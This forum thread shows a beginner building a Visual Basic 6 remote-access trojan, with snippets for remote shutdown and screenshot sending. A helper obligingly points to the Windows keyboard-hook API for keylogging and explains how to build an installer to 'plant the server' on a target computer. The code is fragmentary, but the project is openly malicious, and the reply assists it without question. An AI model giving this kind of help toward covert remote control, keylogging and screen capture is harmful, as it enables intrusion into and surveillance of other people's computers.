Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Categories

help (trojan)

Infected_Infected_ Member Posts: 5
im new to Visual basic 6 but i have started a trojan, so far i have used winsock and can open a connecten between serverclient, i can get the client to send data to the server (using send data) but i can't get the server to do anything with it.this is what im doing

(client)
win.senddata "shutdown"
(server)
win.getdata
case "shutdown"
shell "shutdown -s"
End Sub

and also if some one could send me an example of code to send a screen shot from computer to computer (comes up on a new form).

i dont expect someone to wright the code out for me, just a few hints in the right direction.

Comments

  • BitByBit_ThorBitByBit_Thor Member Posts: 2,444
    : im new to Visual basic 6 but i have started a trojan, so far i have
    : used winsock and can open a connecten between serverclient, i can
    : get the client to send data to the server (using send data) but i
    : can't get the server to do anything with it.this is what im doing
    :

    Are you receiving the data correctly?
    You should debug it by printing every command the client/server receives. That way, you can check whether or not you are receiving everything.

    : and also if some one could send me an example of code to send a
    : screen shot from computer to computer (comes up on a new form).

    I've seen the code to use Windows API to capture the screen. Once I get behind a suitable computer I'll see if I still have it for you.
    The biggest problem with screenshots is probably that you'll want to convert it to jpeg before sending, because a 5 MB bitmap transfer is not fun.

    Best Regards,
    Richard

    The way I see it... Well, it's all pretty blurry
  • Infected_Infected_ Member Posts: 5
    : : im new to Visual basic 6 but i have started a trojan, so far i have
    : : used winsock and can open a connecten between serverclient, i can
    : : get the client to send data to the server (using send data) but i
    : : can't get the server to do anything with it.this is what im doing
    : :
    : Are you receiving the data correctly?
    :
    : You should debug it by printing every command the client/server
    : receives. That way, you can check whether or not you are receiving
    : everything.
    :
    : : and also if some one could send me an example of code to send a
    : : screen shot from computer to computer (comes up on a new form).
    :
    : I've seen the code to use Windows API to capture the screen. Once I
    : get behind a suitable computer I'll see if I still have it for you.
    : The biggest problem with screenshots is probably that you'll want to
    : convert it to jpeg before sending, because a 5 MB bitmap transfer is
    : not fun.
    :
    : Best Regards,
    : Richard
    :
    : The way I see it... Well, it's all pretty blurry

    thanks, i worked out why it wasn't reacting to the data recieved so it will shutdown, send a msg box, open up a form on the server so u can "chat"
    and other simple commands (mainly file handling)

    just a few questions, what command would i use for key logging? (and maybe an example of the command)

    and if i complie my script, do i need to in clude the mswinsock.osx? the other computer its being used on is windows Xp (do they already have it?)
    and if they dont, can i just compile the osx with the server so it downloads and reg it when the server is ran?

    Thanks




  • BitByBit_ThorBitByBit_Thor Member Posts: 2,444
    :
    : thanks, i worked out why it wasn't reacting to the data recieved so
    : it will shutdown, send a msg box, open up a form on the server so u
    : can "chat"
    : and other simple commands (mainly file handling)
    :

    That's the easiest way to debug communication problems: chat :P

    : just a few questions, what command would i use for key logging? (and
    : maybe an example of the command)
    :

    You'll need to look into Windows Hooks. The API for that is SetWindowsHookEx (http://msdn2.microsoft.com/en-us/library/ms644990.aspx).
    You'll need to understand a fair deal about how to use the API's and how generic Windows applications work beneath the hood before you'll know how to use the Hooks.

    : and if i complie my script, do i need to in clude the mswinsock.osx?
    : the other computer its being used on is windows Xp (do they already
    : have it?)
    : and if they dont, can i just compile the osx with the server so it
    : downloads and reg it when the server is ran?
    :

    You're using WinSock and your scripts already compile, so that means your application is linked to WinSock. Good thing is, I *think* WinSock Control is standardly installed on XP boxes. I know for sure WinSock is, but I think also the OCX control.
    Else, you'll have to create an installer app to plant the server + winsock control on the target computer.

    Best Regards,
    Richard

    The way I see it... Well, it's all pretty blurry
  • Infected_Infected_ Member Posts: 5
    : :
    : : thanks, i worked out why it wasn't reacting to the data recieved so
    : : it will shutdown, send a msg box, open up a form on the server so u
    : : can "chat"
    : : and other simple commands (mainly file handling)
    : :
    :
    : That's the easiest way to debug communication problems: chat :P
    :
    : : just a few questions, what command would i use for key logging? (and
    : : maybe an example of the command)
    : :
    :
    : You'll need to look into Windows Hooks. The API for that is
    : SetWindowsHookEx
    : (http://msdn2.microsoft.com/en-us/library/ms644990.aspx).
    : You'll need to understand a fair deal about how to use the API's and
    : how generic Windows applications work beneath the hood before you'll
    : know how to use the Hooks.
    :
    : : and if i complie my script, do i need to in clude the mswinsock.osx?
    : : the other computer its being used on is windows Xp (do they already
    : : have it?)
    : : and if they dont, can i just compile the osx with the server so it
    : : downloads and reg it when the server is ran?
    : :
    :
    : You're using WinSock and your scripts already compile, so that means
    : your application is linked to WinSock. Good thing is, I *think*
    : WinSock Control is standardly installed on XP boxes. I know for sure
    : WinSock is, but I think also the OCX control.
    : Else, you'll have to create an installer app to plant the server +
    : winsock control on the target computer.
    :
    : Best Regards,
    : Richard
    :
    : The way I see it... Well, it's all pretty blurry

    Ok, i wont worry about the logging just yet, il wait till i learn abit more on the subject.
    I do know how to make the install app, and to reg the ocx's once they are extracted, so thats no problem, but im not too sure witch I need to include, so far i can only think of mswinsock.ocx.

    Also with the dir command, is there a way to make this return more then one file name?

    I have also worked out how to send a screen shot from computer to computer, so i no longer need the code.

    Sorry for all the questions, hope its not too annoying.
    Thanks






  • BitByBit_ThorBitByBit_Thor Member Posts: 2,444
    :
    : Ok, i wont worry about the logging just yet, il wait till i learn
    : abit more on the subject.
    : I do know how to make the install app, and to reg the ocx's once
    : they are extracted, so thats no problem, but im not too sure witch I
    : need to include, so far i can only think of mswinsock.ocx.
    :

    Get a program like dependency viewer (depends.exe), or Anywhere PEViewer (I believe it was called), and use it to open your compiled executable. It'll tell you which modules it depends on (which it needs installed to run). However, I read something a short while ago that made me think that VB6 might do runtime loading of it's dependency's, in which case not all modules are visible in depends. Simpelest way to know for sure is to try: create a vanilla executable, but select a random DLL file in the References list, and one in the Components list, and see which ones show up in depends. Are you with me, still? I might else try myself later, because I am not behind a VB6 box.

    : Also with the dir command, is there a way to make this return more
    : then one file name?
    :

    Just call Dir again with no parameters. This way, wildcard searches can be done. Note that when searching directories ( "C:Something*" ), Dir() will return a list: {".", "..", "Subdirectory1", "Subdirectory2", ...}. Note the . and .., they can bug up your code in some cases when searching all files/subdirectories.
    EDIT: Actually, what I said might cause confusion. Dir only returns one filename at a time - with 'return a list', I mean that if you add all these return values together in a list, you'll find that Dir also returns . and .., which is a bit awkward behaviour (imo).

    : I have also worked out how to send a screen shot from computer to
    : computer, so i no longer need the code.
    :
    : Sorry for all the questions, hope its not too annoying.
    : Thanks
    :

    Good to hear. Where did you find it? I google'd for it, but couldn't come up with anything useful (The World Wide Web disappointed me :S).
    Don't worry about the questions - it's only annoying when people ask for everything but make no attempt of their own. But that's not at all the case with you ;)

    Best Regards,
    Richard

    The way I see it... Well, it's all pretty blurry
  • Infected_Infected_ Member Posts: 5
    : :
    : : Ok, i wont worry about the logging just yet, il wait till i learn
    : : abit more on the subject.
    : : I do know how to make the install app, and to reg the ocx's once
    : : they are extracted, so thats no problem, but im not too sure witch I
    : : need to include, so far i can only think of mswinsock.ocx.
    : :
    :
    : Get a program like dependency viewer (depends.exe), or Anywhere
    : PEViewer (I believe it was called), and use it to open your compiled
    : executable. It'll tell you which modules it depends on (which it
    : needs installed to run). However, I read something a short while ago
    : that made me think that VB6 might do runtime loading of it's
    : dependency's, in which case not all modules are visible in depends.
    : Simpelest way to know for sure is to try: create a vanilla
    : executable, but select a random DLL file in the References list, and
    : one in the Components list, and see which ones show up in depends.
    : Are you with me, still? I might else try myself later, because I am
    : not behind a VB6 box.

    i complied a copy to try on a frineds computer, it worked without any files needed, so its all good.


    : : Also with the dir command, is there a way to make this return more
    : : then one file name?
    : :

    : Just call Dir again with no parameters. This way, wildcard searches
    : can be done. Note that when searching directories ( "C:Something*"
    : ), Dir() will return a list: {".", "..", "Subdirectory1",
    : "Subdirectory2", ...}. Note the . and .., they can bug up your code
    : in some cases when searching all files/subdirectories.
    : EDIT: Actually, what I said might cause confusion. Dir only returns
    : one filename at a time - with 'return a list', I mean that if you
    : add all these return values together in a list, you'll find that Dir
    : also returns . and .., which is a bit awkward behaviour (imo).

    i got the dir command working, thanks.

    : : I have also worked out how to send a screen shot from computer to
    : : computer, so i no longer need the code.
    : :
    : : Sorry for all the questions, hope its not too annoying.
    : : Thanks
    : :
    :
    : Good to hear. Where did you find it? I google'd for it, but couldn't
    : come up with anything useful (The World Wide Web disappointed me :S).
    : Don't worry about the questions - it's only annoying when people ask
    : for everything but make no attempt of their own. But that's not at
    : all the case with you ;)

    i haven't tried it yet, but something like

    case "scr"
    dim image
    clipboard.clear
    sendkeys {PRTSCR} <----i cant remember the button name something like that
    image = clipboard.getdata
    form1.winserver.senddata "scn" & image

    would this work? I haven't had a chance because im back at school and we have to do java instead.

    anyway, thanks so far, i sorry i haven't been on for ages.
    : Best Regards,
    : Richard
    :
    : The way I see it... Well, it's all pretty blurry

Sign In or Register to comment.